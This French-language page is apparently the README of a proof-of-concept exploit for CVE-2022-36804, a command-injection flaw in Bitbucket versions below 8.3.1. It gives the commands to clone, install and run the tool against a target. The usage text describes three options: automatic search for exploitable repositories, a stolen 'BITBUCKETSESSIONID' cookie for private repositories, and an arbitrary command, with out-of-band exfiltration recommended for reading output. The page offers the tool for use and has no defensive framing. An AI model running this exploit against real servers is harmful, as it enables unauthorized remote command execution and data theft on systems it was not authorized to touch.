
Exploit PoC relativement fiable pour CVE-2022-36804 (Injection de commande critique dans BitBucket)
Une exploitation PoC assez fiable pour CVE-2022-36804 (injection de commande critique dans BitBucket). Cette attaque nécessite généralement que les dépôts publics soient activés, mais les cookies de session sont également compatibles avec cet exploit. Note : cet exploit inclut la détection automatique de dépôt, pratique si vous ne souhaitez pas trouver manuellement des dépôts ouverts.
git clone https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit.git;
cd CVE-2022-36804-PoC-Exploit
python3 -m pip install -r requirements.txt
python3 main.py [cible]
usage: main.py [-h] [--project PROJECT] [--repo REPO] [--skip-auto] [--session SESSION] [--command CMD] server
Exploiter les instances BitBucket (< v8.3.1) via CVE-2022-36804. L'exploitation se fait automatiquement sans paramètres supplémentaires, mais permet également des réglages personnalisés.
positional arguments:
server
options:
-h, --help afficher ce message d'aide et quitter
--project PROJECT Le nom du projet dans lequel se trouve le dépôt
--repo REPO Le nom du dépôt
--skip-auto Ignorer la recherche automatique de dépôts exploitables
--session SESSION Valeur du cookie 'BITBUCKETSESSIONID', utile si le dépôt cible est privé
--command CMD Commande à exécuter si l'exploit réussit (note : l'obtention d'une sortie n'est pas fiable, une exfiltration hors bande est donc indispensable)